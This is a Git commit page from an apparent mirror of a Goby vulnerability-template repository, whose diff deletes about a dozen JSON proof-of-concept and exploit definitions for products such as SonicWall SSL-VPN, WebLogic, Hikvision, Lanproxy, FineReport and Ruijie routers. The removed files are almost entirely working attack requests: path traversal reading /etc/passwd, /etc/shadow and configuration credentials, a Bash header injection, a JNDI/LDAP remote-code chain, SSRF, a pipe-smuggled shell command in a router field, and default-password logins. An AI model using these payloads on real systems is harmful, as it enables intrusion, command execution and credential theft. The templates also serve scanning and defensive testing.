qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

1

This commit is contained in:
test 2022-11-25 18:58:59 +08:00
parent b62a548143
commit 95c480e0f9
15 changed files with 0 additions and 885 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
json/HIKVISION ╩╙╞╡▒α┬δ╔Φ▒╕╜╙╚δ═°╣╪ ╚╬╥Γ╬─╝■╧┬╘╪.json
View File

@ -1,78 +0,0 @@
{
"Name": "HIKVISION 视频编码设备接入网关 任意文件下载",
"Level": "1",
"Tags": [
"任意文件下载"
],
"GobyQuery": "(app=\"Hikvision-Video-coding-device-access-gateway\" || title=\"视频编码设备接入网关\")",
"Description": "海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞\n\n访问 http://xxx.xxx.xxx.xxx/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 下载文件",
"Product": "HIKVISION 视频编码设备接入网关",
"Homepage": "https://www.hikvision.com/cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Filename",
"type": "select",
"value": "../web/html/data/saveUserInfo.php,../../../../../../WINDOWS/system32/drivers/etc/hosts,../web/html/serverLog/downFile.php",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "$file_name=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/serverLog/downFile.php?fileName={{{Filename}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-02-06 14:59:46",
"GobyVersion": "1.8.237"
}

78
json/Lanproxy ─┐┬╝▒Θ└·┬⌐╢┤ CVE-2021-3019.json
View File

@ -1,78 +0,0 @@
{
"Name": "Lanproxy 目录遍历漏洞 CVE-2021-3019",
"Level": "2",
"Tags": [
"目录遍历"
],
"GobyQuery": "header=\"Server: LPS-0.1\"",
"Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具支持tcp流量转发可支持任何tcp上层协议访问内网网站、本地支付接口调试、ssh访问、远程桌面等等本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。",
"Product": "Lanproxy 0.1",
"Homepage": "https://github.com/ffay/lanproxy",
"Author": "PeiQi",
"Impact": "<h5><span style=\"font-size: 1.25em; color: rgb(65, 140, 175);\">咩咩咩</span>🐑</h5>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Filename",
"type": "select",
"value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/../conf/config.properties",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "server.ssl",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{Filename}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-22 18:20:52",
"GobyVersion": "1.8.237"
}

0
json/MessageSolution ╙╩╝■╣Θ╡╡╧╡═│EEA ╨┼╧ó╨╣┬╢┬⌐╢┤ CNVD-2021-10543.json → json/MessageSolution CNVD-2021-10543.json
View File

0
json/NETGEAR-DGND3700v2-┬╖╙╔╞≈-c4_IPAddr-╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json → json/NETGEAR-DGND3700v2rce.json
View File

0
json/OpenSSL╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤-ú¿CVE-2022-2274ú⌐.json → json/OpenSSL CVE-2022-2274.json
View File

82
json/SonicWall SSL-VPN ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json
View File

@ -1,82 +0,0 @@
{
"Name": "SonicWall SSL-VPN 远程命令执行漏洞",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "(app=\"SonicWALL-Company's-product\" || app=\"SonicWALL-SSL-VPN\")",
"Description": "SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP此设备存在远程命令执行漏洞",
"Product": "SonicWall SSL-VPN",
"Homepage": "https://www.sonicwall.com/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "cat /etc/passwd",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/jarrewrite.sh",
"follow_redirect": true,
"header": {
"User-Agent": "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/jarrewrite.sh",
"follow_redirect": true,
"header": {
"User-Agent": "() { :; }; echo ; /bin/bash -c '{{{Cmd}}}'"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-26 15:28:34",
"GobyVersion": "1.8.237"
}

55
json/Wayos AC╝»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡┐┌┴ε CNVD-2021-00876.json
View File

@ -1,55 +0,0 @@
{
"Name": "Wayos AC集中管理系统默认弱口令 CNVD-2021-00876",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"",
"Description": "深圳维盟科技股份有限公司是国内领先的网络设备及智能家居产品解决方案供应商主营产品包括无线网关、交换机、国外VPN、双频吸顶ap等。\n\nAC集中管理平台存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。\n弱口令 admin:admin",
"Product": "深圳维盟科技股份有限公司AC集中管理平台",
"Homepage": "http://www.wayos.com/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "user=admin&password=admin"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "flag=0",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-02-07 23:13:20",
"GobyVersion": "1.8.237"
}

87
json/Weblogic LDAP ╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤ CVE-2021-2109.json
View File

@ -1,87 +0,0 @@
{
"Name": "Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
"Description": "2021年1月20日绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPUCritical Patch Update共修复了329个不同程度的漏洞其中包括7个影响WebLogic的严重漏洞CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
"Product": "WebLogicd",
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
},
{
"name": "Ldap",
"type": "input",
"value": "ldap://xxx.xxx.xxx;xxx:1389",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "JNDI",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
"follow_redirect": true,
"header": {
"cmd": "{{{Cmd}}}"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-22 13:55:45",
"GobyVersion": "1.8.237"
}

101
json/Weblogic SSRF┬⌐╢┤ CVE-2014-4210.json
View File

@ -1,101 +0,0 @@
{
"Name": "Weblogic SSRF漏洞 CVE-2014-4210",
"Level": "2",
"Tags": [
"SSRF"
],
"GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
"Description": "Weblogic中存在一个SSRF漏洞利用该漏洞可以发送任意HTTP请求进而攻击内网中redis、fastcgi等脆弱组件此漏洞可通过HTTP协议利用未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n\nOracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n\nhttp://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001",
"Product": "Oracle WebLogic Server",
"Homepage": "https://www.oracle.com",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp":true,
"ExpParams":[
{
"name":"payload",
"type":"input",
"value":"127.0.0.1:7001",
"show":""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Search",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
},
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
},
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
}
],
"PostTime": "2021-01-23 20:47:39",
"GobyVersion": "1.8.237"
}

60
json/XXL-JOB ╚╬╬±╡≈╢╚╓╨╨─ ║≤╠¿─¼╚╧╚⌡┐┌┴ε.json
View File

@ -1,60 +0,0 @@
{
"Name": "XXL-JOB 任务调度中心 后台默认弱口令",
"Level": "2",
"Tags": [],
"GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "userName=admin&password=123456"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-17 12:24:54",
"GobyVersion": "1.8.237"
}

53
json/╓┬╘╢OA A6 ╩²╛▌┐Γ├⌠╕╨╨┼╧ó╨╣┬╢.json
View File

@ -1,53 +0,0 @@
{
"Name": "致远OA A6 数据库敏感信息泄露",
"Level": "1",
"Tags": [
"敏感信息泄露"
],
"GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))",
"Description": "致远OA A6 存在数据库敏感信息泄露攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5",
"Product": "致远OA A6",
"Homepage": "PeiQi",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/yyoa/createMysql.jsp",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-18 21:36:42",
"GobyVersion": "1.8.237"
}

84
json/╖½╚φ▒¿▒φ v8.0 ╚╬╥Γ╬─╝■╢┴╚í┬⌐╢┤ CNVD-2018-04757.json
View File

@ -1,84 +0,0 @@
{
"Name": "帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757",
"Level": "1",
"Tags": [
"任意文件读取"
],
"GobyQuery": "app=\"fanruansem-FineReport\"",
"Description": "FineReport报表软件是一款纯Java编写的集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。\n\nFineReport 8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。",
"Product": "FineReport 8.0版本",
"Homepage": "PeiQi",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "CDATA",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "CDATA",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-21 19:44:01",
"GobyVersion": "1.8.237"
}

70
json/╖Σ═°╗Ñ┴¬ ╞≤╥╡╝╢┬╖╙╔╞≈v4.31 ├▄┬δ╨╣┬╢┬⌐╢┤ CVE-2019-16313.json
View File

@ -1,70 +0,0 @@
{
"Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313",
"Level": "2",
"Tags": [
"账号密码泄露"
],
"GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")",
"Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器",
"Product": "蜂网互联企业级路由器v4.31",
"Homepage": "http://www.ifw8.cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/action/usermanager.htm",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "pwd",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/action/usermanager.htm",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-02-21 11:22:17",
"GobyVersion": "1.8.237"
}

137
json/╚±╜▌NBR┬╖╙╔╞≈ EWEB═°╣▄╧╡═│ ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json
View File

@ -1,137 +0,0 @@
{
"Name": "锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞",
"Level": "3",
"Tags": [
"远程命令执行"
],
"GobyQuery": "(app=\"Ruijie-EG\" || title=\"锐捷网络-EWEB网管系统\" || app=\"Ruijie--EWEB\")",
"Description": "锐捷NBR路由器 EWEB网管系统部分接口存在命令注入导致远程命令执行获取权限",
"Product": "锐捷NBR路由器 EWEB网管系统",
"Homepage": "http://www.ruijie.com.cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "cat /etc/passwd",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/guest_auth/guestIsUp.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "mac=1&ip=127.0.0.1|cat /etc/passwd > PeiQi.txt"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/guest_auth/guestIsUp.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "!=",
"value": "404",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "File not found.",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": ">__<",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/guest_auth/guestIsUp.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "mac=1&ip=127.0.0.1|{{{Cmd}}} > PeiQi.txt"
},
"SetVariable": [
"output|lastbody"
]
},
{
"Request": {
"method": "GET",
"uri": "/guest_auth/PeiQi.txt",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-26 10:37:09",
"GobyVersion": "1.8.230"
}

0
json/╠┌┤∩┬╖╙╔╞≈-setusbunload-├ⁿ┴ε╓┤╨╨┬⌐╢┤-ú¿CVE-2020-10987ú⌐.json → json/腾达路由器 setusbunload 命令执行漏洞 (CVE-2020-10987).json
View File